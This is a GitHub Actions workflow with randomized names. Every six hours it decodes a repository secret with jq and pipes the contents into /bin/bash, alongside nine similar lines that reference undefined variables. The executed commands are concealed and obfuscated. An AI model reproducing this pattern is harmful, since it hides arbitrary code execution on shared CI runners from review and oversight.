name: liutang19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          sx5394: ${{ secrets.sx5394 }}
        run: |
          echo $sx5394 | jq -r .u917 | /bin/bash
          echo $kwo7 | jq -r .tjdoo34768 | /bin/bash
          echo $sxb314 | jq -r .zyc3 | /bin/bash
          echo $mp44 | jq -r .irinp42571 | /bin/bash
          echo $fhfgv28 | jq -r .yc96 | /bin/bash
          echo $bujz372 | jq -r .ty71 | /bin/bash
          echo $zfti6964 | jq -r .wovwi40599 | /bin/bash
          echo $mhnu45341 | jq -r .orwth3 | /bin/bash
          echo $cux3 | jq -r .fcgxm90606 | /bin/bash
          echo $lmkgz404 | jq -r .fb279 | /bin/bash

